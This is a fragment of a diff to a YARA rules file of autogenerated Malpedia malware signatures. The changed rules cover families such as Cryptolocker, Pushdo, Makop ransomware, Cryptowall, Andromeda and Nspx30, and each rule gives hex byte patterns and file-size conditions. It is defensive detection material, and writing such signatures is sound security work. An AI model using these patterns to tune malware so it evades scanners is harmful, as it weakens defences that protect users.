+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.adylkuzz_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "62aff47bf3ddbcb69a86cf1dabc7a43bddd2da8a74c7bd24c0bccdeef4523386"
+		logic_hash = "de5f91809dc8ef12371c16bfe87d826bfdd622a4d5fefa4fc686464cb89ee65c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140230,32 +139952,32 @@ rule MALPEDIA_Win_Edam_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c8ff eb1e 8b45fc 3bd6 8b0c8560b74500 0f95c0 02c0 }
-		$sequence_1 = { 50 8d45b0 8955d8 50 e8???????? 8d45b0 50 }
-		$sequence_2 = { 8bc1 83e13f c1f806 6bc930 8b048560b74500 f644082801 7406 }
-		$sequence_3 = { 40 c745ec603c4200 894df8 8945fc 64a100000000 8945e8 }
-		$sequence_4 = { 8bd1 8b42e8 8d72e8 8b4004 c74410e818654400 8b06 8b4804 }
-		$sequence_5 = { 50 6a01 8d4dd4 e8???????? 68???????? 8d45d4 c745d4c0634400 }
-		$sequence_6 = { 8b45f0 894df4 8b048560b74500 c644022a0a 0f8484000000 }
-		$sequence_7 = { 8d8d08fdffff c785b4fdffff0f000000 c785b0fdffff00000000 c685a0fdffff00 e8???????? 8b859cfdffff }
-		$sequence_8 = { 6a55 ff34f5788a4400 ff7508 e8???????? 83c40c 85c0 }
-		$sequence_9 = { 3bc6 7353 807d8600 8a88a87c4400 8b857cffffff 8808 }
+		$sequence_0 = { c1c002 3bec f5 33d8 03f8 e9???????? 668b442500 }
+		$sequence_1 = { e8???????? 8b35???????? b9???????? 89d8 8b7b08 89f2 e8???????? }
+		$sequence_2 = { f8 81c508000000 f5 f9 8901 660fc1c0 81ee04000000 }
+		$sequence_3 = { f6c32d 3bce d2e8 6689442504 0fbfc2 660fb6c5 0fc8 }
+		$sequence_4 = { f7d8 33d8 663bd2 f5 03f8 ffe7 660fb6442500 }
+		$sequence_5 = { c7042400000000 b90b000000 89fa 89d8 e8???????? 85c0 7482 }
+		$sequence_6 = { df6c2428 eb77 837c241c08 0f8595020000 f744242000008000 7504 df2e }
+		$sequence_7 = { f7d0 8b06 f5 6685fb 33c3 f9 663bf0 }
+		$sequence_8 = { 8b5034 39d1 0f47ca f6c740 7408 8b5038 39d1 }
+		$sequence_9 = { e8???????? 8b5e08 83fb03 7518 8b16 b9fbffffff 89e8 }
 
 	condition:
-		7 of them and filesize < 807936
+		7 of them and filesize < 6438912
 }
-rule MALPEDIA_Win_Cryptolocker_Auto : FILE
+rule MALPEDIA_Win_Babar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c4f4307-498a-5b8a-b0ac-d9860b1cffe0"
+		id = "b29cd175-863b-5025-9e64-c8f5753d1c62"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptolocker_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babar_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "0e60803263408ddfb3182de11bb9ae9942a6a4eed3e22029213fee0c658ec6ec"
+		logic_hash = "2b221179b5f8ee2ea03d97e07ac34f9970eda994151497ddf7357451a1c3d5d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140269,82 +139991,77 @@ rule MALPEDIA_Win_Cryptolocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e810 50 8b4610 52 ffd0 0fb6c0 5e }
-		$sequence_1 = { 83f80d 7605 663bc3 7504 }
-		$sequence_2 = { 8b06 8945e0 8b4604 8945e4 8b4d14 }
-		$sequence_3 = { 7539 ff7508 8b55ec 8b4de8 e8???????? }
-		$sequence_4 = { 48 7527 33f6 397714 7620 8b1d???????? 8b4710 }
-		$sequence_5 = { 5d c21800 8b4304 6a40 ff7518 8b4004 }
-		$sequence_6 = { ff15???????? 668b45dc 66a3???????? 8be5 5d c3 33c0 }
-		$sequence_7 = { 4e 49 79e4 5b }
-		$sequence_8 = { 740e 50 52 ff35???????? ff15???????? 5f }
-		$sequence_9 = { 8bd8 81fb7a000780 750e 807dff00 751f }
+		$sequence_0 = { 3bd6 7505 8d55e0 eb16 }
+		$sequence_1 = { 3bd6 721b 57 8bcb e8???????? 8bc8 }
+		$sequence_2 = { 3bd6 7503 8d5014 895010 }
+		$sequence_3 = { 3bd7 0f8440010000 397e14 0f8437010000 }
+		$sequence_4 = { 46 ddd9 83fe03 ddd8 }
+		$sequence_5 = { 3bd6 7505 8d55d8 eb16 }
+		$sequence_6 = { 3bd7 7215 7704 3bc3 }
+		$sequence_7 = { 3bd6 72d9 33f6 eb08 }
+		$sequence_8 = { 7506 807a0100 751c 8bc6 83c301 }
+		$sequence_9 = { 83c104 5f 8bc1 2b442414 5e c60100 }
+		$sequence_10 = { eb4b 8b4c2428 55 6800014004 55 55 55 }
+		$sequence_11 = { 8b5308 8b03 8bf9 33fa }
+		$sequence_12 = { 89542448 ffd5 50 53 ff15???????? 85c0 }
+		$sequence_13 = { 8b15???????? 5f 895608 8bc6 5e 8b8c2408060000 33cc }
+		$sequence_14 = { 8d442418 50 6a00 57 51 }
+		$sequence_15 = { 0fb65002 83e23f 0fb61432 885103 83c003 83c104 }
 
 	condition:
-		7 of them and filesize < 778240
+		7 of them and filesize < 1294336
 }
-rule MALPEDIA_Win_Pushdo_Auto : FILE
+rule MALPEDIA_Win_Makop_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea9fd106-28fc-55dd-aa56-b9cc29b476a3"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pushdo_auto.yar#L1-L210"
+		id = "cd34e745-9497-5ffc-bd73-ecb5996e2067"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makop_ransomware_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "44aafb8e474bf55b9e9061326e2ace4a0bcd7b0153f05d8cb31960fbba3d00f5"
+		logic_hash = "3c7cc3419f322a8e9eb8473ecaf54fc5da0725e8a0f35ff3f90245e28389848b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7f9 33c9 ba88020000 f7e2 }
-		$sequence_1 = { 50 ff15???????? 33d2 b9ffff0000 f7f1 }
-		$sequence_2 = { 60 8b45fc b10b d3c0 61 }
-		$sequence_3 = { 8a85effeffff 888415f0feffff 8b4d08 034dfc 0fbe11 }
-		$sequence_4 = { 81ec18010000 6800010000 6a00 8d85f0feffff 50 e8???????? }
-		$sequence_5 = { 8b55fc 3b5510 0f83a6000000 8b45f4 83c001 25ff000000 }
-		$sequence_6 = { 8b450c 0345fc 8810 e9???????? 8be5 }
-		$sequence_7 = { 8b55fc 83c201 8955fc 817dfc00010000 736a 8b45fc }
-		$sequence_8 = { 03c2 c1f808 49 79dd }
-		$sequence_9 = { ff15???????? 8945fc 3bc7 0f84a1010000 8d45ec 50 8d4598 }
-		$sequence_10 = { 7413 8d45f8 50 8d85f0fdffff 50 }
-		$sequence_11 = { 6a04 bb00300000 53 bf00100000 }
-		$sequence_12 = { 0f849f000000 8d45f8 50 6801008000 6801680000 ff75fc }
-		$sequence_13 = { 52 8d8588fbffff 50 e8???????? }
-		$sequence_14 = { 8b5508 8b02 8945f4 837df400 741a 8b4df4 }
-		$sequence_15 = { e8???????? 898544feffff 8b8544feffff 33d2 b90a000000 }
-		$sequence_16 = { 8bff 55 8bec 8b450c c1e810 }
-		$sequence_17 = { eb0f 8b9570fdffff 83c201 899570fdffff 83bd70fdffff14 }
-		$sequence_18 = { 2b4dfc 3b4dec 7307 33c0 e9???????? 8b55fc }
-		$sequence_19 = { e8???????? 8945b8 6a6c 8b4db8 51 e8???????? 8945b8 }
-		$sequence_20 = { 55 8bec 0fb6450c c1f804 83e00f 8b4d08 8a906c520009 }
+		$sequence_0 = { eb02 33f6 803d????????00 751f 803d????????00 7516 80fb01 }
+		$sequence_1 = { 52 50 51 e8???????? 8b542430 83c40c 68e0930400 }
+		$sequence_2 = { 52 66c7060802 66c746041066 c6460820 }
+		$sequence_3 = { 56 ff15???????? 85c0 750b 8906 32c0 5e }
+		$sequence_4 = { 83c001 84c9 75f7 2bc7 83e801 39442404 720a }
+		$sequence_5 = { ffd6 85ff 740f 85db 740b 837c242000 7404 }
+		$sequence_6 = { 8b2d???????? 3beb 742e 8b4524 3bc3 7407 50 }
+		$sequence_7 = { 7416 e8???????? 6a00 e8???????? 83c404 }
+		$sequence_8 = { e8???????? 8b442418 83c40c 8b4f0c }
+		$sequence_9 = { 742f 33c0 3906 763d 8d4c2448 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Cruloader_Auto : FILE
+rule MALPEDIA_Win_Unidentified_110_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39947838-03a3-5a24-945d-6e866d043993"
+		id = "cf62c553-12f9-5533-845c-44826d9d56b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cruloader_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_110_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4307b8e0f195ebffc58740c34a8819f9896c989908200e4e4f90e094ceef34c2"
+		logic_hash = "e61c3758e63fca434ff16788b9f2b50055e755cc5399fb0099b370350ca7876a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140358,32 +140075,32 @@ rule MALPEDIA_Win_Cruloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 57 8b7d08 eb6f 8b07 8d1c85605c4100 }
-		$sequence_1 = { 8b413c 0f104508 53 56 }
-		$sequence_2 = { 8bcf 83e73f c1f906 6bd738 8b0c8dd85e4100 c644112800 85f6 }
-		$sequence_3 = { 6bc618 57 8db8e8604100 57 ff15???????? }
-		$sequence_4 = { c0c104 80f19a 884c15f0 42 3bd0 }
-		$sequence_5 = { 8b75e4 3bf7 7523 baf63f4890 b901000000 }
-		$sequence_6 = { 33f6 898de0fcffff 898500fdffff 85db }
-		$sequence_7 = { 894de0 8b049dd85e4100 f644082801 7469 }
-		$sequence_8 = { 8b8514fdffff 898d0cfdffff 0fb74006 898508fdffff 85c0 7433 83c108 }
-		$sequence_9 = { b902000000 e8???????? ba241d19e5 a3???????? }
+		$sequence_0 = { 753e 4c89f1 89da 4189e8 e8???????? 8a08 488b5040 }
+		$sequence_1 = { 4c89e0 48f7e1 4989c7 0f91c0 0f8050010000 88c3 48c1e306 }
+		$sequence_2 = { f0480fc11d???????? 8b05???????? 65488b0c2558000000 488b04c1 80b82001000000 7505 e8???????? }
+		$sequence_3 = { 48ffc8 4883f802 0f83ab000000 488bb42430010000 488d4e18 498b1424 e8???????? }
+		$sequence_4 = { e8???????? 0f1006 0f104e10 0f105620 0f119390000000 0f118b80000000 0f114370 }
+		$sequence_5 = { 4c89c1 e8???????? 4889c7 83ff01 7543 4889d9 ba2f000000 }
+		$sequence_6 = { 4c8d642448 49c7c6ffffffff 4c89e9 e8???????? 6683f801 0f85b6000000 89d5 }
+		$sequence_7 = { 4c8d0557060800 ba25000000 e8???????? 0f0b 56 4883ec20 488b31 }
+		$sequence_8 = { 4869cf48010000 4801c1 4883c108 48c741f801000000 41b840010000 4c89f2 e8???????? }
+		$sequence_9 = { 65488b0c2558000000 488b2cc1 0fb7b578010000 66c785780100000180 4889f9 4c89f2 e8???????? }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 3217408
 }
-rule MALPEDIA_Win_Sykipot_Auto : FILE
+rule MALPEDIA_Win_Turnedup_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e29757c6-dae5-5753-908e-00d3e87a0250"
+		id = "f4a24578-5335-5053-b07f-943404877172"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sykipot_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turnedup_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "744def3f8deb3752311459797b4729b29083d33b4fd30373345787d25fb29e80"
+		logic_hash = "70af128b8d10ec8ac1a0ea6deea907b76cc81c6db7a8cb227ddf71385e7b13b6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140397,34 +140114,34 @@ rule MALPEDIA_Win_Sykipot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d842494030000 68???????? 50 ffd6 83c40c 85c0 0f85fd000000 }
-		$sequence_1 = { 8bcd 83e103 8d442410 f3a4 }
-		$sequence_2 = { b93f000000 33c0 8dbc2469060000 88942468070000 f3ab }
-		$sequence_3 = { 3bf3 89742438 751b 8d4c2424 }
-		$sequence_4 = { 83c408 85c0 75da 8b85e8feffff 8b8dd8feffff eb06 }
-		$sequence_5 = { c1e902 f3a5 8bcd 8d94248c010000 83e103 }
-		$sequence_6 = { aa c744241820000000 52 8d442428 50 ff15???????? 83c9ff }
-		$sequence_7 = { 8b94242c060000 56 8d842498000000 57 }
-		$sequence_8 = { 50 ffd6 83c40c 8d4c2428 51 68???????? 6a00 }
-		$sequence_9 = { e8???????? 83c410 68???????? ffd5 8d842488000000 50 ffd5 }
+		$sequence_0 = { 6a0d c741140f000000 c7411000000000 68???????? 8945a8 c60100 }
+		$sequence_1 = { 85db 7417 8d4df4 8bf3 }
+		$sequence_2 = { 7f0d 0fbed0 0fbec1 8d4a05 }
+		$sequence_3 = { c70600000000 c6460401 807e0530 0f8cf1000000 807e0400 7538 8b0e }
+		$sequence_4 = { 740f e8???????? 8b4dbc 8801 }
+		$sequence_5 = { 8d44244c 50 e8???????? dd542448 8b442434 }
+		$sequence_6 = { 7405 884305 eb06 c70300000000 c6430401 8a4b05 884dbb }
+		$sequence_7 = { ffd3 83ec1c 8bcc 6a0d c741140f000000 c7411000000000 68???????? }
+		$sequence_8 = { c60100 e8???????? c3 56 }
+		$sequence_9 = { 8945fc 8d45fc 50 8d4df0 e8???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 892928
 }
-rule MALPEDIA_Win_Cryptowall_Auto : FILE
+rule MALPEDIA_Win_Nspx30_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50af5d84-6bf2-5e21-963e-da71c1d0aa83"
+		id = "b7c1fb90-4e2e-567c-b71f-a04015c19cf0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptowall_auto.yar#L1-L108"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nspx30"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nspx30_auto.yar#L1-L307"
 		license_url = "N/A"
-		logic_hash = "44ba25f2c9e3be57522d3914736a7aa98c9dc8885fa529ce3340a46dbf9f3527"
+		logic_hash = "21c2ef2f3120756bc5bb636c0145196e56cf18e54f32669d823d96a566a0c7b3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -140436,32 +140153,53 @@ rule MALPEDIA_Win_Cryptowall_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 8b482c ffd1 6a00 }
-		$sequence_1 = { 83ec08 837d0800 7502 eb4f 6a08 6a00 }
-		$sequence_2 = { e8???????? 83c408 99 b91a000000 }
-		$sequence_3 = { 894dfc 837df805 752d 837dfc00 }
-		$sequence_4 = { 83ec18 56 8b450c 50 }
-		$sequence_5 = { 99 b91a000000 f7f9 83c261 8b45f4 }
-		$sequence_6 = { e8???????? 83c408 8b0d???????? 898114010000 }
-		$sequence_7 = { b861000000 668945ee b963000000 66894df0 }
-		$sequence_8 = { 52 e8???????? 8b400c ffd0 }
-		$sequence_9 = { 6880000000 6a00 8d4de8 51 }
+		$sequence_0 = { f3ab 66ab aa b06c }
+		$sequence_1 = { 0f8418030000 8b8530e5ffff 8b0485384c0410 f644060480 0f8400030000 e8???????? }
+		$sequence_2 = { 8903 c7831400080000000000 eb58 ff15???????? 8bc8 8b44240c }
+		$sequence_3 = { 6a04 6800100000 03c3 57 50 ff5508 }
+		$sequence_4 = { 8bf0 85db 742e 85ff }
+		$sequence_5 = { 66c78424d80000007300 66c78424de0000006100 66c78424e20000006f00 66c78424e60000002100 66c78424ea0000006500 66c78424ec0000007700 66c78424ee0000003a00 }
+		$sequence_6 = { 8b45f8 50 e8???????? 8945a8 688e4e0eec }
+		$sequence_7 = { 6689b4249c000000 52 be32000000 6a00 51 66c74424787b00 66c744247a3300 }
+		$sequence_8 = { 0f8c89010000 8b4c2410 8b11 8b420c 8b7a08 }
+		$sequence_9 = { 33c0 e9???????? 8b550c 52 6a14 e8???????? }
+		$sequence_10 = { 5e 7426 40 c60057 40 c60049 40 }
+		$sequence_11 = { 833800 0f8494010000 ff750c ff7508 e8???????? 8bf0 }
+		$sequence_12 = { 8b44240c 85c0 7460 53 ba04000000 }
+		$sequence_13 = { e8???????? 8b0f 8bc1 c1f805 83e11f 8b0485384c0410 c1e106 }
+		$sequence_14 = { 83ec0c 53 8b5c2414 56 57 6a01 }
+		$sequence_15 = { b843000000 66898c24c0000000 66898c24ce000000 66898c24d2000000 }
+		$sequence_16 = { 6689bc24fe000000 6689bc2400010000 6689b42402010000 66c78424040100004500 66c78424080100003300 66c784240a0100004500 }
+		$sequence_17 = { 6689444ffe 3bcb 72e7 e9???????? 8b7c2418 33c9 85db }
+		$sequence_18 = { bf???????? 83c9ff 33c0 6a5c }
+		$sequence_19 = { 8b0495384c0410 83c702 ff3418 ff15???????? 85c0 750e ff15???????? }
+		$sequence_20 = { 894dfc 8b55fc 8b4508 034220 8945ec }
+		$sequence_21 = { 8b1481 8955d8 8b4508 0345d8 eb04 eba4 }
+		$sequence_22 = { ffd2 c7461000000000 8b4608 53 8b5c2410 85c0 }
+		$sequence_23 = { 83c404 c745fcffffffff 833d????????00 8b07 }
+		$sequence_24 = { c7402420120010 c7402860120010 33c0 5e c20800 6879270000 ff15???????? }
+		$sequence_25 = { b801000000 5b 81c410030000 c20c00 5f 5e }
+		$sequence_26 = { 5b 754a c7002c000000 895004 895008 c7400ca0120010 }
+		$sequence_27 = { 83c9ff 33c0 c644240c57 c644240d69 c644240e6e c644240f64 c64424106f }
+		$sequence_28 = { 6a00 ff15???????? 8bfb 83c9ff 33c0 b25c f2ae }
+		$sequence_29 = { 7c86 5f 5d 5e 5b }
+		$sequence_30 = { 57 66896c2436 66896c2446 8d4c2414 bb38000000 be2d000000 }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 3789824
 }
-rule MALPEDIA_Win_Tonerjam_Auto : FILE
+rule MALPEDIA_Win_Pgift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f786075c-cfe5-5b49-a6e1-4889818e7624"
+		id = "5134e180-c701-504d-b27b-1f2a37782304"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonerjam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tonerjam_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pgift_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d8a6c742127525a08706ace06fd5028ecb9ea4f1402f1305542963485e91aa8b"
+		logic_hash = "86543d2a9c2965bb35bf9078bd182bce16bae717918e12d47f187ce1755d9b8f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140475,34 +140213,34 @@ rule MALPEDIA_Win_Tonerjam_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4c2458 448d4218 ff15???????? 488d442458 c744247068000000 4889442448 }
-		$sequence_1 = { 41b804010000 ff15???????? 33d2 488d8d50010000 41b804010000 }
-		$sequence_2 = { 4883ec28 e8???????? 488bc8 488d15314e0100 4883c428 e9???????? 48895c2418 }
-		$sequence_3 = { 488d4508 458bce 4533c0 4889442420 488d1515c10100 48c7c102000080 ff15???????? }
-		$sequence_4 = { ff15???????? 85c0 757c 48c7c0ffffffff }
-		$sequence_5 = { 4903c0 660f1f840000000000 8030e5 488d4001 }
-		$sequence_6 = { 33d2 e8???????? 4885db 7414 488d0536d70100 483bd8 }
-		$sequence_7 = { 33c9 ff15???????? cc b801000000 488b8c2430010000 4833cc e8???????? }
-		$sequence_8 = { c3 397c2440 488b5c2448 400f95c7 8bc7 }
-		$sequence_9 = { 488d0dbac10100 e8???????? 48c7c3ffffffff 488d8d70020000 488bc3 0f1f4000 48ffc0 }
+		$sequence_0 = { c645fc03 e8???????? ff7510 8d4de8 }
+		$sequence_1 = { e8???????? 8d7e01 57 ebac }
+		$sequence_2 = { 53 6a11 ff15???????? 8bd8 8d45ec }
+		$sequence_3 = { 53 6a01 6800000040 ff75ec ff15???????? 8bd8 }
+		$sequence_4 = { 7408 ff4510 83c710 eb99 8b4e14 }
+		$sequence_5 = { 89450c 8d45e4 53 50 8d4594 50 }
+		$sequence_6 = { 50 8d4de4 e8???????? 33db 8d8de4feffff 895dfc 895dec }
+		$sequence_7 = { 8d4de8 c645fc01 e8???????? 83f8ff 750f 6a2f 8d4de8 }
+		$sequence_8 = { e9???????? 8b4d08 8bc3 2bc1 c1f802 3bc7 7369 }
+		$sequence_9 = { e8???????? ff75e8 ff15???????? eb53 8b45ec 3958f8 742f }
 
 	condition:
-		7 of them and filesize < 315392
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Joanap_Auto : FILE
+rule MALPEDIA_Win_Andromeda_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "59ddd497-e48f-5e4c-aaa1-e68a7dcd2888"
+		id = "aedaa52d-9d6c-5053-8164-d65674aef5c3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.joanap_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.andromeda_auto.yar#L1-L305"
 		license_url = "N/A"
-		logic_hash = "2db58924366bc00afcca8a8ac59fc7a0399fb6bba1dea50a7dd31138b4827114"
+		logic_hash = "20401b03708a6c3a0bc1e9efb5c1e1d85a9de75bca8501a792bc92bf7f214fb5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -140514,32 +140252,54 @@ rule MALPEDIA_Win_Joanap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89510c 8b0d???????? dd442418 dd5c0810 8d9c2488030000 c744241432000000 8b43f0 }
-		$sequence_1 = { 8d4c240a 6a01 51 56 ff15???????? 6a00 }
-		$sequence_2 = { 8844241a 8844241b a1???????? 89442408 8b8590010000 33d2 56 }
-		$sequence_3 = { 8b3d???????? 8d4c2414 51 56 ffd7 85c0 a3???????? }
-		$sequence_4 = { 8d8c24b0000000 51 56 ffd7 85c0 a3???????? 750c }
-		$sequence_5 = { 893d???????? ff15???????? 8b842494000000 6a01 6820bf0200 53 66c74304feff }
-		$sequence_6 = { 66c74424380040 e8???????? 83c414 83f8ff 0f8468010000 668b4610 6689442424 }
-		$sequence_7 = { 83c404 eb58 8d4e03 51 e8???????? 83c404 eb4a }
-		$sequence_8 = { 8bac2424100000 8b3d???????? 8b1d???????? 894820 6a01 }
-		$sequence_9 = { 6a01 6820bf0200 8d442418 6a04 50 56 }
+		$sequence_0 = { 02d6 81e2ff000000 368a942a00ffffff 301439 41 }
+		$sequence_1 = { 8b7508 33db 368a942900ffffff 02c2 }
+		$sequence_2 = { 7408 43 3b5d0c 74cf ebcf 33c0 }
+		$sequence_3 = { 55 8bec 81c400ffffff 60 b940000000 8d7dfc b8fcfdfeff }
+		$sequence_4 = { fec0 368a942800ffffff 02da 368ab42b00ffffff 3688b42800ffffff 3688942b00ffffff 02d6 }
+		$sequence_5 = { e2f8 fc 33c0 8b7508 }
+		$sequence_6 = { 368ab42800ffffff 3688b42900ffffff 3688942800ffffff fec1 }
+		$sequence_7 = { 8d7dfc b8fcfdfeff fd ab 2d04040404 e2f8 }
+		$sequence_8 = { 60 e8???????? 5d 81ed???????? 33c9 }
+		$sequence_9 = { 0fb64601 84c0 7905 0d00ffffff }
+		$sequence_10 = { 0f9ec1 33d2 3c41 0f9dc2 85ca 7404 0420 }
+		$sequence_11 = { 8a06 33c9 3c5a 0f9ec1 33d2 3c41 }
+		$sequence_12 = { 8d45d0 50 6a01 ff7508 }
+		$sequence_13 = { 50 e8???????? 83c40c 6800000100 e8???????? }
+		$sequence_14 = { 68???????? 50 ff15???????? 83c40c 56 6880000000 }
+		$sequence_15 = { 689f010000 6811010000 57 68???????? ff15???????? 50 }
+		$sequence_16 = { 68401f0000 e8???????? 668945e2 c745e400000000 }
+		$sequence_17 = { c745e400000000 6a00 6a00 6a00 6a06 6a01 6a02 }
+		$sequence_18 = { c7459c44000000 8945d4 8945d8 8945dc 66c745cc0000 c745c801010000 8d458c }
+		$sequence_19 = { 7457 33c0 8d7d9c b944000000 f3aa 6a00 6a00 }
+		$sequence_20 = { e8???????? ff75f4 e8???????? 68???????? 6801010000 e8???????? }
+		$sequence_21 = { 6a02 e8???????? 8945f0 83f8ff 7479 }
+		$sequence_22 = { e8???????? 8945f8 83f800 0f8458010000 }
+		$sequence_23 = { 6804010000 ff75fc 6a00 e8???????? 6a00 ff75f8 }
+		$sequence_24 = { 81fb5267a723 0f843fffffff 56 ff7514 }
+		$sequence_25 = { 0faff8 69f677adcc8a 81ffd02eaced 0f84a1feffff e9???????? 803beb }
+		$sequence_26 = { 81e604002402 81e747af3c96 81ce00008000 81c760345938 }
+		$sequence_27 = { 8b4574 833800 0f846c010000 6af5 ff5510 }
+		$sequence_28 = { ff5614 8bd8 81f392be3437 81ff64e62722 0f8418010000 8365f000 6850020000 }
+		$sequence_29 = { ff5638 314508 ff560c 8b7d04 0bd8 81fbb599839e 7503 }
+		$sequence_30 = { 81f99cd8b976 7417 85db 7c73 }
+		$sequence_31 = { ff5518 33f8 81f6acec75ce 81ff45ee1de6 0f84ce000000 837d4800 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Lolsnif_Auto : FILE
+rule MALPEDIA_Win_Odinaff_Auto : FILE
 {
 	meta:
